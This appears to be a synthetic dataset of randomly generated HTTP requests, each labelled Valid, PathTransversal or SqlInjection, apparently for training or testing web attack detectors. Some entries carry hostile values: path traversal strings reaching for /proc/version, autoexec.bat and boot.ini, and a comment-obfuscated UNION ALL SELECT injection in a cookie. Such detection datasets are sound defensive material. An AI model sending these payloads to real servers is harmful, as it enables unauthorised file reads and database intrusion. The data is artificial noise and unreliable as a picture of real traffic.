GET /c9smd/h_w1xKdbRwSFpwEU/4YC/tsnaaeEoyhudu.jpg?hu=ioit&seldbs=anbcibnoslike&ouesexwettta=zgallwindow.open&6passwd9rj_P%ujG=6308 HTTP/1.0
Host: www.loronm.fr
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-5
Accept-Encoding: 
Accept-Language: atdtbvd-jreh;q=0.2, hstetepm-imo9d, Es-AEtnld9;q=0.6, etex-s;q=0.1, eeir-edooi
Cache-Control: xhirdD='z'
Client-ip: 244.38.93.139
Cookie: Jtmp2CC4k7=Icu;etdzataOlcTer=n2h;deeR=../../../../../../proc/version;n0RRdxncPNUQ=41;isenh1s0toa4d=hzaw0awrdhr;tNp=Pfbrotk6ddabbeaeas
Cookie2: $Version="38"
Date: Tue, 23 Jan 07 13:14:29 CET
ETag: W/"wJKXqFobe90qGYIqT6"
Expect: 100-continue
If-Modified-Since: Sun, 15 Jul 07 12:16:51 GMT
If-Match: *
If-None-Match: "AOdeD039uoh-QyYd5"
If-Range: Tue, 21 Dec 04 10:12:08 CET
Max-Forwards: 4800
MIME-Version: 9.1
Pragma: no-cache
Authorization: Basic V3pkY2lmNTpoNWFlaA==
Range: 96-,-2452
Referer: /szBwoE/nyeeTb3a/lrsti/hga5ieo.bin
TE: trailers,deflate
User-Agent: Mozilla/8.8 (X11; U; Solaris 1.0; cf-wm; rv:5.6.6) Gecko/98311101
UA-OS: FreeBSD
Via: HTTP/4.5 www.wtnnsn.png, HTTP/3.8 www.pB3cre0.js
Transfer-Encoding: deflate
Upgrade: 6ore/4.9, wMa/2.9, 4tdtc/1.0, htiso/2.5
Warning: 392 www.eeh4.shtml "lroHplwvh" "Mon, 08 Jan 07 11:23:41 UTC"
X-Serial-Number: 743263355123616133
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46067
Start - Id: 14564
class: Valid
GET /eynIfaEcCw1QIU/rh/stodah/9GuzA4B-wb/crIEsdqzHyWp7d9U/tfL@kxx8YqU/433dN0-aSkvM/h-FKT_W_FvQ/4-E/innhhstErrhn2eba.gif?a3ecntogdSbtlt=pscde+c9meSoiPhdeleter&ZHOth6Wum=1&Iesvr3ay=9&nsaeucse1rmu=4&sQiSOZT=hoy HTTP/1.0
Host: www.nulec.st:0
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: nw-1h, eser-es;q=0.5, 0rhnb-sr;q=0.0, Odidal-meuh;q=0.9, vtye8t-3wteci
Cache-Control: only-if-cached
Client-ip: 0.42.144.154
Cookie: bhm9I=nOPh._@2m5Y;atsiknndreZ=wp-pxt;8c=16
Cookie2: $Version="54"
Date: Sun, 07 May 06 05:33:34 CET
ETag: W/"9PcQxzvbn4EKPriIyaum"
Expect: 100-continue
From: ethi@67rhTr.de
If-Modified-Since: Thu, 08 Apr 10 09:18:36 UTC
If-Unmodified-Since: Sat, 07 Nov 09 13:58:42 UTC
If-Match: "9_wO5Y9@0emv9Jp5avdr"
If-None-Match: *
If-Range: Sat, 30 Aug 08 04:19:01 GMT
Max-Forwards: 8304
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic bXViYXRlOmNlcmUzcg==
Authorization: NTLM dUFkeXRuYUd5cnRmd3RjN3B0aHdBbnJybGR1cGxhZGxnb3Vl
Range: 6-933,-891
Referer: /hueql6/Enpoefti/rUynotn2/hhTtn.mdb
TE: trailers,deflate,chunked;q=0.0
Trailer: Accept-Language
User-Agent: rnr8gy
UA-CPU: 68000
UA-Disp: 962,7885,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7668x5565
Via: 9.4 56.196.183.141:4
Transfer-Encoding: 2hATs9
Upgrade: scAhts/5.3, ntread/5.7, ttaotf/9.8, Otisii/6.3
Warning: 479 www.tohasa.png "0ag7Uwsi" 
X-Forwarded-For: 245.67.1.90
X-Serial-Number: 703782437729534
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14564
Start - Id: 22971
class: Valid
GET /2caTJ7yo7/tA/4hwry/ieet8aifmincml5cln/opt9PBlsXhMr6qjEPcat/2GEkjlsaKTAvu/tjqvC38j7g/ejlME/PxamUMCGWdelete/TI9lae/cbto/Z1Pw-ehV0.php4? HTTP/1.0
Host: www.e1Oe.ch
Connection: keep-alive
Accept: application/*
Accept-Charset: shift_jis
Accept-Encoding: deflate
Accept-Language: iss1e-iJriot
Cache-Control: da5Ftn='norL'
Client-ip: 237.229.255.165
Cookie: srn7=nh7_H43s_.B;Sop8r=220589;joptgRLj8TAU7=m1buf;nwitrne1Rs8xrTx=ehsd4esf0o;8CiokoxTzcat7G=evhenf3mmwxp;sCG58ZxjR%u=4065585
Cookie2: $Version="724"
Date: Sun, 25 Jan 09 08:55:59 CET
ETag: W/"eHDCc8I2ruIgyos"
Expect: rEooiR
From: ap2o@ettoab6r.com
If-Modified-Since: Wed, 27 Sep 06 04:48:20 CET
If-Unmodified-Since: Mon, 07 Jan 08 09:06:41 UTC
If-Match: "643EI@VOJ4NjeCM"
If-None-Match: *
If-Range: *
Max-Forwards: 978
MIME-Version: 2.6
Pragma: dme=yttc
Proxy-Authorization: Basic aGhhcjppZTJp
Authorization: Digest response="A20b0dBe214babFaAC8A4B1A1CfED9A1"
Range: 31732-,84218-
Referer: http://www.srofo.cz/grveoli/eisRoigo.fgf
TE: deflate,chunked;q=0.6,gzip
Trailer: Pragma
User-Agent: ijq2YA http://www.ng6lel.org
UA-CPU: x86
UA-Disp: 052,5191,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5290x6765
Via: 6.7 www.egch.png, FTP/0.0 219.56.1.95, 0.4 www.eadce3.htm:2030
Transfer-Encoding: identity
Upgrade: bae/0.4, hee6y0/8.7, soqh/2.5, sdle8/1.8, bdseN/0.5
Warning: 438 49.79.91.51:038 "rCeoI3u9lEt" "Sat, 30 Apr 05 03:17:12 GMT"
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22971
Start - Id: 12009
class: Valid
GET /cnAhif4teegfslrrmtie/qzNyZPDVGxBgK6/bNumohjtwixpdotmr/MPrSautoexecsock_streamVSnIj/aKinput_/tterOtcroiwSdAmet/nide6nettenk/umeralaAeittc2aetuxa/gcnotmaneoVhhu.asp?cytmoi9t=srEi1yeanow749u0tt&umroonveesinth=9901852464&hStposSem9t=Tyt&flyten=597 HTTP/1.1
Host: www.Uoisitorti.st
Connection: keep-alive
Accept: image/gif;q=0.1, application/*;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, deflate;q=0.5
Accept-Language: *;q=0.3
Cache-Control: min-fresh=6
Client-ip: 245.199.21.14
Cookie: Aetc7QzrmnullBd=6700769;oEsinTdecLR=twsheETsnt7tl2nse;eIUcad=bg4.GK8qZUZ6
Cookie2: $Version="8"
Date: Thu, 22 Jun 06 24:08:31 CET
ETag: "azk_rN20wtoPDiQA8P"
Expect: tgAligh
From: ecltistt@earirni.gov
If-Modified-Since: Thu, 15 May 08 21:24:09 CET
If-Unmodified-Since: Sat, 07 Feb 09 03:16:10 CET
If-Match: "Y0WnI6XFSGTok@2D78O"
If-None-Match: *
If-Range: Wed, 02 Dec 09 04:19:05 UTC
Max-Forwards: 7828
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM dGlmaWp1c1gwUkUzcDEzOXdmbnJuY2FuRUFpRGVlWXJhdGF0
Range: -8,856500-,-6463
Referer: http://www.eeypcidr.biz/ioiw/eoetroi.php3
TE: trailers
Trailer: Accept
User-Agent: 0hgl (nal3N0yP; tTMm5x; h0XMW.Ie; a@8U28)
UA-CPU: x86
UA-Disp: 196,901,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 165x736
Via: FTP/4.9 163.225.44.7, 3.1 227.108.198.14, ieena/4.4 19.192.255.37
Transfer-Encoding: identity
Upgrade: mied/2.1, ubr6/9.8, kedlo/6.1, ohn/1.7, Ncaq/5.3
Warning: 188 www.kfdnt3g.shtml "5UopedxhgtiSicsla" 
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 733133463900664569
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12009
Start - Id: 17984
class: Valid
GET /cWEgk-49u/tpPr7ZB8kNLO7odqDkh/gFEh8ssi/slLJTf9J/c0s.mdb?ct2se=6&onnstaclsdostns=re%5C+&sua0mltuAe=0144&rienOi=0mneqTyatb&sc6ejojnwrtL=Tueiyr+&Hho5oleeyu=%3Ft%3EosmnRaf1+su&sjW8KI0QTDw9=94&cKteOvt=o+tadmaillll&reA1eo=2997&3lcht=345718208&h9o3eEpei9ne=iSp5x8GZ2&udu6namcca9ooes=e&isihele=0932966&itoc6teea=fecEexec HTTP/1.1
Host: www.heaod.cz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-icelandic, iso-8859-6;q=0.6
Accept-Encoding: 
Accept-Language: itsveja-l;q=0.4, rgpcee-haaue
Cache-Control: no-transform
Client-ip: 195.151.147.160
Cookie: 9CjpEY=294;sT8tilii8roifh=insertiis;fut=340837
Cookie2: $Version="07"
Date: Fri, 04 Jun 04 10:32:49 GMT
ETag: W/"v_bZgiUX_t931JyZ"
Expect: aereoiar=ndite
From: 3lhked@reen2i5.fr
If-Modified-Since: Thu, 13 Apr 06 03:27:52 GMT
If-Unmodified-Since: Mon, 16 May 05 02:19:04 UTC
If-Match: *
If-None-Match: "LIGHK4ng3xN9wpqJhxPB"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.4
Pragma: plsmno='afa3h'
Proxy-Authorization: NTLM cmVpeXNyYXlvZVRlczRpZWFFZWVPSG9lbGlvaW95YWZ1aWRub3I3Y3I=
Authorization: NTLM ZXN0em5laFNvc3lhc3B6ckw3bkl5d3Vja21laGV1ZWRh
Range: -44534,46459-4352,54-118133
Referer: /9astzzwe/wtyi.bin
TE: trailers,chunked;q=0.5
Trailer: Transfer-Encoding
User-Agent: fxY2n7dW2X http://www.n0doe.st
UA-CPU: Sparc
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 642x5791
Via: 4.4 www.hdlz.htm
Transfer-Encoding: deflate
Upgrade: cnfwrA/0.9, une/2.8, wm5eaE/8.6, 5Anel/9.5, a2n/0.8
Warning: 459 241.242.121.187 "idot1nq9S" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 26415350505787254
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17984
Start - Id: 34970
class: Valid
PUT /Xjn9gexecVTr9/2Z7ab5ozvU8zLR.DBe5/tel/3etkthls/dP9GKrhavingYV.css? HTTP/1.0
Content-Length: 212
Content-Language: trnhcjeI,Tfdil
Content-Encoding: compress
Content-Location: http://pmhi.fr/2Ekcn/uueoost.conf
Content-MD5: ZXN1aWhhc3B3c3Nzb2VlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Oct 04 03:34:18 CET
Last-Modified: Wed, 13 Oct 04 18:03:09 CET
Host: 13.55.235.92:84
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-cn, windows-1258, utf-8;q=0.2, iso-8859-15
Accept-Encoding: identity, gzip, identity;q=0.7
Accept-Language: lerisne-g, rT-mS
Cache-Control: min-fresh=9
Client-ip: 210.178.89.60
Cookie: OfhAahgnahaenNa=suzNi-BxsyP
Cookie2: $Version="2"
Date: Mon, 26 Jan 09 10:33:19 GMT
ETag: "INuV8pKCEwWu6gA8wE"
Expect: 100-continue
From: Jfon@lR0e.de
If-Modified-Since: Sat, 21 Jul 07 18:44:54 GMT
If-Unmodified-Since: Tue, 30 Jan 07 03:53:46 GMT
If-Match: "KHEmzIhpH36uNeMIubk"
If-None-Match: *
If-Range: Sat, 09 Sep 06 04:59:36 UTC
Max-Forwards: 04
MIME-Version: 5.8
Pragma: 8top8=och
Proxy-Authorization: NTLM ZWdLYTZ0aW9oM2VzdWdZbDRoYWwxZ2g1bmxweXJyZXRyWGR0OW5hT3hOZQ==
Authorization: dram n9ren=oahp
Range: 364064-7831,-653,14-
Referer: /Oerdbn/pt0tl.jpg
TE: trailers,chunked,gzip;q=0.2
Trailer: Upgrade
User-Agent: hnct3g/0.9.4
UA-CPU: StrongARM
UA-Disp: 4391,758,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 938x6622
Via: FTP/8.3 www.a0llen.jpg, FTP/4.9 90.76.99.212, 7.5 76.126.184.199
Transfer-Encoding: deflate
Upgrade: e9caF/7.4
Warning: 649 www.lron.gif:35057 "0dpoRgetreeaaBs2" 
X-Forwarded-For: 90.170.127.145
X-Serial-Number: 755245432377424
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Esnl2cievtao11a=e9&VLp-j=n96m_thXO2-&t2hsndAuerh=miframeeie9uj n&8IU1eoew=69064906&bdInrRnats=291&nepsgse2=76824&lTheerssgeesqIe=fNaon&r3rOn=ohw n'logp8ctr&adwo=s4nrenen&epnlinl=lythienebsh7lou&sUrtr89Czhc2=Soh

End - Id: 34970
Start - Id: 36183
class: PathTransversal
GET /tDy/i8na1plo9lif/8@K/inirxgbuXiapwu/aXVI.nsf?sAbtr=7x&erI=%5Cautoexec.bat&itpM6l3ecs8alCh=h+mh HTTP/1.0
Host: www.lrs6gl.gov
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ubt-hpoaug, sstznnio-eZ2w;q=0.5, d6u-maeeEDa, mmc-Shnwtunl;q=0.2
Cache-Control: max-stale=0963
Client-ip: 164.124.198.233
Cookie: edeyeaj=emfnlaasMaaesorsle;ecw=snptiss2dis0e;Zwboot.iniT1connect7HtfkP=ddmcpr;thmdp=t boa;no8ncxi6Ery=otFspsr@ynp~~+fa;OmHeav=t'\5sntasd
Cookie2: $Version="3"
Date: Tue, 24 Jun 08 10:40:15 CET
ETag: W/"Q7Jz2ge_Ige@5abJPX"
Expect: oss8oa
From: hseoct@sy2ts.fr
If-Modified-Since: Mon, 14 Nov 05 23:19:34 GMT
If-Match: "-M4HgsDwz.LEKgF"
If-None-Match: *
If-Range: Wed, 04 Apr 07 22:46:13 UTC
Max-Forwards: 069
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM bHFrZW5keUxveWNlN2RiMXJvTGVudXNzM25ycXllbXJ1cGF0
Authorization: Digest cnonce="g1eaaho"
Referer: /BexDs/nogeeeo6/ehFtsfy/nNron.pdf
TE: chunked;q=0.5,gzip;q=0.0
Trailer: Authorization
User-Agent: 3redyd (cmiaQVG; a.HQoVKXy)
UA-Disp: 094,1448,16
UA-OS: Win9x
UA-Pixels: 0116x5631
Via: FTP/9.3 216.161.6.142, HTTP/0.8 121.100.10.121
Transfer-Encoding: identity
Upgrade: aehn/9.5
X-Forwarded-For: 143.21.25.63
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36183
Start - Id: 3899
class: Valid
PUT /Oy/2j8QMxXV2/andbpnnmnwShleace7/pXservicesd6jRTCnT/0p3z/aSOekFBMs-DNq926F/iani5co4gyrf/gnesRtch/plrmYusm/nnulefe9dnovfT/hu02jjhJOv/cHhazeereo.jsp? HTTP/1.1
Content-Length: 279
Content-Language: irs9oi
Content-Encoding: deflate
Content-Location: http://anzteaol.ch/iwrF/tteooa/ekeekTi/svspzer/rChtowpt.mp3
Content-MD5: c2lvclJlYVRidXQxNXZjMA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Dec 07 16:10:31 GMT
Last-Modified: Sat, 01 Apr 06 02:24:09 UTC
Host: www.W8tohdtdl.ch
Connection: toaikerw
Accept: application/*;q=0.2, video/*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: 8eioteix-hcate, afc-at2ssm1o, dobnpf-noeht;q=0.6, iJ-i;q=0.3
Cache-Control: 3lycyn='romxetge'
Client-ip: 59.129.2.242
Cookie: rrite38htiethf=r68Vy_
Cookie2: $Version="29"
Date: Sat, 27 Mar 04 02:25:27 UTC
ETag: "bxyyir1MhmyaT3oI"
Expect: rult
From: iriuh@orcqa.com
If-Modified-Since: Mon, 20 Mar 06 22:26:07 UTC
If-Unmodified-Since: Tue, 17 Oct 06 09:11:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 07
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eifolu 4ediEcn=nOfs3b
Authorization: n2Yln tisdaads=r5eoox0
Range: -7148,2780-
Referer: http://mtttbjnn.biz/shtwEm1e.tiff
TE: deflate,deflate;q=0.2,deflate
Trailer: User-Agent
User-Agent: Mozilla/3.6 (compatible; MSIE 2.2; SunOS sun4u; eVee; tsmtessh; hhoOEmV)
UA-CPU: Sparc
UA-Disp: 837,1241,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 993x108
Via: HTTP/9.3 161.243.16.187, HTTP/1.5 www.rsa4.htm
Transfer-Encoding: deflate
Upgrade: qbtdne/8.9
Warning: 738 www.osltlmZp.shtml:65942 "mnse" 
X-Forwarded-For: 18.27.104.194
X-Serial-Number: 537380175884943310
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iklhrsm0n1nath=processing-instruction&pd=hIrmt&hHiethd=8&TFZwb2ULHL=0&TWy5.HBp2Fy=jeno9seqyeltz4oa&-T7E=109548&rbroieceixihn9=axaofsn3stirie&OaEvvlsms=twn6nullnph-~ete&ryoPfayiet=d2z$ &zDpkdngriwi=tgf&eiYeanrVeuhh=69948063&iSbdepotteteeA=rmconnectiooi(xsHi L&x3htE=8WLCMFqH

End - Id: 3899
Start - Id: 41260
class: SqlInjection
GET /tZAygzcFXrX@tPbgeM/aW9CNoDieJMyfu56VAz@/epAVmwBLokb.NP.html?oddh=76683&7SohN=205706375&giOotusE=iq7.pFTWW&reur3gp=++eo%3FrlD%3FfmNunionas&mons0k=ute&snahlTmuarEa=106646&wX=34327&asre6ga2iotja=45306&imdn=nEezs0wla+Mo&Icbhtkou=edptac&mRgdlcp=lsechot&nat7in0uis=%3CEmformhet+&1eez6ueoeexr3b2=formde%3D&2ns=tp.74V HTTP/1.0
Host: www.asgnln.biz
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-10646-ucs-2, iso-8859-1, windows-1253;q=0.1, windows-1255, utf-8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: cipItr7e=entn1n
Client-ip: 14.225.9.11
Cookie: drioglNiie1=hn);hre=3646583;gkCyekdmmr=wa2ahtheaE2ttxe;wetctnsmsoo=oAhos;JmXoIPY='    )/**/UNIONALL/**/SELECT/**/1/**/FROM/**/giqrt96a/**/WHERE/**/(  ''    ='    /**/
Cookie2: $Version="29"
Date: Sat, 18 Sep 04 19:23:57 UTC
ETag: W/"Wvv3CDJBxhFNvweH10T"
Expect: 100-continue
If-Modified-Since: Sun, 06 Jan 08 02:55:07 UTC
If-Unmodified-Since: Thu, 11 Oct 07 08:47:52 GMT
If-Match: "gjCTI27CAYs51FX"
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 2.9
Proxy-Authorization: Digest username="htctmgeT"
Authorization: ontSes llrhn=Eirnka
Referer: /t9es/ieciseb/og3t/uomn10s.swf
TE: deflate,deflate
User-Agent: Mozilla/1.6 (Windows; U; WinNT 9.9; nd-ii; rv:4.4.0) Gecko/79488912
UA-OS: Win9x
Via: 0.3 www.IAatnElb.js, okw/2.3 223.170.10.232, 2is/6.6 www.rrlimvi.css
Transfer-Encoding: compress
Upgrade: uaiiie/9.7, uslvel/1.2, jlr/9.6, aowern/5.3, alax/3.9
Warning: 175 167.147.154.199 "deeo6cnepi8y8gaoon" 
X-Serial-Number: 31839527885705
~~~~~: ~~~~~~~~~~

null

End - Id: 41260
Start - Id: 6841
class: Valid
POST /nirffaihtsSesi/arts/rF/rKp/rlae/t3auvi/wLPWw5KBSO/jjjAKw.cfm? HTTP/1.1
Content-Length: 63
Content-Language: ae,el,etuicw
Content-Encoding: gzip
Content-Location: http://www.cNrobnft.fr/huhAe/tVpnhndo.gif
Content-MD5: cFdldGhDZ2JtdXJvVE9kcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 May 07 19:37:05 CET
Last-Modified: Mon, 18 May 09 15:31:38 CET
Host: www.oe0oNae.com
Connection: gpezz
Accept: image/*
Accept-Charset: windows-1252, euc-jp;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=52
Client-ip: 56.166.151.5
Cookie: 20ia=v$;pAyTdmme8=a h g;ae7at0odfrll=t$;CkGLcopyallGhQM1=uyebawoldatr;mncy3t=c2Jr787C;I-binMACNmknEO=ak
Cookie2: $Version="628"
Date: Tue, 12 Sep 06 16:56:56 CET
ETag: W/"qmkQusRfs2p4B8o5H"
Expect: 100-continue
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Fri, 21 Sep 07 19:30:12 CET
If-Unmodified-Since: Wed, 13 Sep 06 09:32:28 GMT
If-Match: *
If-None-Match: "4Z-QdmEQhURDJqt-1gU"
If-Range: *
Max-Forwards: 37
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: Digest realm
Range: 708-,54-
Referer: http://myxp.it/areCi/Sra0ig/5osnq5p/dtlc8/e0oedso.jsp
TE: trailers
Trailer: Range
User-Agent: esxjcN http://www.aeet.uk
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 302x0187
Via: 6.1 www.ets1i.gif:7600, tcr8m/3.2 www.enrr.htm, in2O/8.1 193.50.191.123
Transfer-Encoding: eestrt; ar9ewte=fiaroa8
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 649 203.53.186.124 "goDwmmazMte" "Fri, 23 Sep 05 06:11:33 UTC"
X-Forwarded-For: 38.119.21.192
X-Serial-Number: 4856761489912748
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sue6ovpia=e1mk3nll27ihmwry&ufkosohmrtagnnm=3969&sg2oCbn=6824095

End - Id: 6841
Start - Id: 27686
class: Valid
GET /a.MWrUoSt8GK/acaL/nrA9W8w8lkvWeFZC7Uuo/t1cbqcX7hjEoqP/uSjgm8Ufg/il/eU7tB/ox4bcostfvlo/AgLqPo.css?Lmi=9&pusgoo=sb&mKTylike@S_lS1c=5039095&ouetrdu=aV8CSs.WQc&oryofuuiu=230&ssrra1li5=MAiwaueo&NmjlsLNlUh=slj&itaaa3jgotd=er&BDfhu_servicess7select-=027&puaa0qihsaa=eexirp&eanegaesv=e%3Bnr%5C%3Cdv%7C3r%2Buu%2F HTTP/1.0
Host: www.jsgxcasu.be:7
Connection: close
Accept: audio/*;q=0.2, audio/x-wav, audio/x-wav;q=0.6
Accept-Charset: cp-950
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 163.4.168.12
Cookie: _rPLwp--RAX@EZ=06;tt=it;ssveg=tQcouenioleuioe;Hreahsrxp=a1d1esfttubfaiqk4t;z1Pg=1so
Cookie2: $Version="23"
Date: Mon, 07 Dec 09 20:01:30 CET
ETag: W/"jjbn.BcKvzk8oUEXzB33"
Expect: 100-continue
From: sSue@OaasXm.net
If-Modified-Since: Thu, 21 May 09 15:50:21 UTC
If-Unmodified-Since: Wed, 02 Feb 05 01:44:30 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 46
MIME-Version: 9.8
Pragma: ymhEelIA='aEasHsu'
Proxy-Authorization: bigT jsta3s=3stlP
Authorization: Basic ZWU0NmVpOjNhaXJheGc=
Range: 716735-,44690-4,8-024480
Referer: http://www.8heaau.net/oNmxas.mdb
TE: gzip,trailers,chunked
Trailer: Trailer
User-Agent: tRo2qGDwgR http://www.htMtm.gov
UA-CPU: 68000
UA-Disp: 408,9856,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1357x8118
Via: 3.0 www.iHtsi.css, nhye/5.8 www.ar4dotao.htm, 1.9 15.105.188.87:7602
Transfer-Encoding: identity
Upgrade: 7tihjo/8.0, sel/5.7, yAiesw/1.4
Warning: 970 72.235.240.132 "rtdlLp" 
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 9842192214995
----: -----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27686
Start - Id: 13067
class: Valid
GET /tsjfac_ylL3Kt4s.cgi?9evhTex1ovm=tnc&oaivo=ohGU%7CIL8h&i0lge=o%3Ct%7E&6h@B865e8=%2Frh&eVeiesittd19e=33&iEeernscdpebddN=88551446&hmlyxfh=lcA%2Be&Z0Gdtp=qLoLDwTfmT.&nyn=3 HTTP/1.1
Host: 214.235.230.198
Connection: iortrt
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: dydiE='e'
Client-ip: 178.86.14.70
Cookie: ub=Tr6Tiocebeuae4;eH9hArl=ltm;wQtawewERo0eArk=79;meataanewt=nMv24tOA-;ZWsGd%u2VJAD=amf%3Eo1pvnpz4+s
Cookie2: $Version="333"
Date: Thu, 14 Oct 04 22:42:20 CET
ETag: W/"EkEIURHNewalKPt"
Expect: 100-continue
From: cnaeE@mn5a6.gov
If-Modified-Since: Sun, 01 Oct 06 09:01:55 UTC
If-Unmodified-Since: Mon, 05 Nov 07 07:25:19 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 08 May 05 23:48:00 UTC
Max-Forwards: 763
MIME-Version: 4.1
Pragma: l='reA'
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: Digest algorithm=Czonoid
Range: 55-
Referer: /eecn/urosSC9/6bso/Qucer/rsfde.php4
TE: trailers,deflate;q=0.1,trailers
Trailer: Cache-Control
User-Agent: iK@rrY6a http://www.uioGhsi.st
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x190
Via: 6.0 2.228.61.141, HTTP/8.2 18.161.152.114
Transfer-Encoding: hiu3of; rderua=tmAdrnI
Upgrade: astdJ/5.5, faeDiW/0.6, erEeIl/0.5, tpmc1/5.0
Warning: 628 www.nttty.js "cnhetkwotorseofg3" "Sat, 23 Jun 07 05:37:50 GMT"
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 837041373393858
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13067
Start - Id: 2974
class: Valid
GET /dfr6cra2d1hyac8iahee/IdYutcLiaei/aexpjeaufLrpo/oIytY/pk8CDSVwindow.open0ML1Z/wae/e9eeToliu/3t3rL/tepncjathll8pdh/arFH1d9c.9_SYBU@Brjc/9JHMQVKQPRsK/betweenKSprocessing-instructionr0d.png?bsihea=r8%26delete%3Aert%5Caeo0eetqSon&gtr5=Sh3ohhihseohr37r&n1e=autoexecdmilneunion%3Azzor&j5lJk6idS=cpct&cdoejunBur8e=3768&oLlttsamgig=mgser0y&rocaupgwDnruo=4&icw6ns4=2&lBZ=eunion+s%3Bhnati&.JOc4O_lG=stvedoptn3einse%5CFie&hnetw=fea8&us4tas6=893973&ticmfAtToa7c=eb&ERasnabt9=4FHf5d HTTP/1.0
Host: www.4liu.uk
Connection: keep-alive
Accept: image/gif
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 233.41.255.68
Cookie: ebndaeetnae=nitaargcdl;_Dx3=i@IcQGjC;ef@mocha3ikLV=yla?cktonm54dem;VpTagt=cetrykttibrtp7h;guo9habndslhog=ryrrleheyH
Cookie2: $Version="1"
Date: Wed, 18 Oct 06 08:44:28 UTC
ETag: W/"gkaRWdgtR1N8TwMOaI@"
Expect: 100-continue
From: sMew@IhehlCaold.be
If-Modified-Since: Fri, 07 Aug 09 18:08:10 UTC
If-Unmodified-Since: Mon, 22 Jan 07 20:35:13 UTC
If-Match: "A_DWtfWsW9fD7TZcM"
If-None-Match: "M_NBaAeQGXl6a4P"
If-Range: *
Max-Forwards: 08
MIME-Version: 1.3
Pragma: eo='K'
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: ofkgf tomeysc=hInauc2
Range: 941701-436,57-,44-
Referer: http://www.udchtai.it/inesl/vsftsea/ifyo8be/53gNhoss/mibaiba.doc
TE: trailers
Trailer: Proxy-Authorization
User-Agent: ectsAe/6.1.8.4.9
UA-CPU: StrongARM
UA-Disp: 5870,274,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8247x2505
Via: 5.1 95.164.57.35, HTTP/2.9 35.181.208.175:82
Transfer-Encoding: dtfe
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2974
Start - Id: 24723
class: Valid
